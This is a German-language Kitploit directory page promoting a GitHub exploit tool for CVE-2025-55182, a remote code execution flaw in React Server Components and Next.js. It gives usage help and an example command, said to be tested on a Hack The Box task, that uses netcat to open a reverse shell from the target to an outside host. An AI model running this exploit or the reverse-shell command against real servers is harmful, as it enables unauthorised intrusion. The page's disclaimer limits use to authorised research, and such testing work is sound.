Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-React2Shell — CVE-2025-55182 Exploit | by infrar3d | Kitploit
Tools/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2025-55182-react2shell
Payload GenerationExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubindustri4l-h3ll-xpl0it3rs/cve-2025-55182-react2shell

CVE-2025-55182-React2Shell

CVE-2025-55182 Exploit | by infrar3d

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 3 MonatenNoch nicht geprüft

CVE-2025-55182-React2Shell

Exploited von infrar3d

Eine kritische Sicherheitslücke mit Schweregrad 10.0, die die serverseitige Nutzung von React.js betrifft, verfolgt als CVE-2025-55182 in React.js und CVE-2025-66478 speziell für das Next.js-Framework.

Diese Schwachstelle wurde am 29. November 2025 PT von Lachlan Davidson verantwortungsvoll an das Meta-Team offengelegt. Die erste Offenlegung und der Patch-Release erfolgten durch React und Vercel am 3. Dezember 2025 PT. (Original: https://react2shell.com/)

Verwendung:

root@kitploit:~
python3 CVE-2025-55182.py --help 
usage: python CVE-2025-55182.py -u <URL> [-c COMMAND]

CVE-2025-55182 - React Server Components RCE Exploit

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL (required)
  -c, --command COMMAND
                        Command to execute on target (default: id)

Example: python CVE-2025-55182.py -u http://target.com -c "whoami"


Beispiel (getestet auf HTB-Aufgabe):

root@kitploit:~
python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"

⚠️ Haftungsausschluss ⚠️

Diese Software und der Proof-of-Concept-Code werden ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt.

  • Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
  • Nicht gegen Systeme verwenden, ohne ausdrückliche vorherige Genehmigung.
  • Die Verwendung dieser Tools zum Angriff auf Ziele ohne Einwilligung ist illegal.

Sie sind dafür verantwortlich, alle geltenden Gesetze einzuhalten. Ethisch und verantwortungsvoll verwenden.

Tool herunterladen